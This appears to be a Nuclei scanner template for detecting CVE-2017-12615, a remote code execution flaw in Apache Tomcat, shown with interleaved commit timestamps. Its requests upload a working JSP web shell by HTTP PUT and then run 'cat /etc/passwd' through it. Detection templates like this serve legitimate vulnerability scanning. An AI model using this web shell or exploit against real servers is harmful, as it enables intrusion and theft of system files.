2021-02-10 09:44:26 +00:00
id : CVE-2017-12615
info :
2022-06-09 20:35:21 +00:00
name : Apache Tomcat Servers - Remote Code Execution
2021-02-10 09:44:26 +00:00
author : pikpikcu
2021-09-10 11:26:40 +00:00
severity : high
2021-02-10 09:44:26 +00:00
description : |
2022-06-09 20:35:21 +00:00
Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request.
2022-04-22 10:38:41 +00:00
reference :
- https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
2022-05-17 09:18:12 +00:00
- https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E
2022-07-01 10:02:07 +00:00
- http://web.archive.org/web/20211206035549/https://securitytracker.com/id/1039392
2022-06-09 20:35:21 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-12615
2022-06-07 20:50:59 +00:00
- http://web.archive.org/web/20210616200000/https://www.securityfocus.com/bid/100901
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 8.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2017-12615
cwe-id : CWE-434
2022-07-21 17:18:22 +00:00
tags : cve,cve2017,apache,rce,tomcat,kev
2021-02-10 09:44:26 +00:00
requests :
- method : PUT
path :
- "{{BaseURL}}/poc.jsp/"
headers :
Content-Type : application/x-www-form-urlencoded
body : |
2021-08-19 14:44:46 +00:00
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
2021-02-10 09:44:26 +00:00
- method : GET
path :
- "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-12-29 13:40:59 +00:00
2021-02-10 09:44:26 +00:00
- type : status
status :
- 200
2022-06-09 20:35:21 +00:00
# Enhanced by mp on 2022/06/09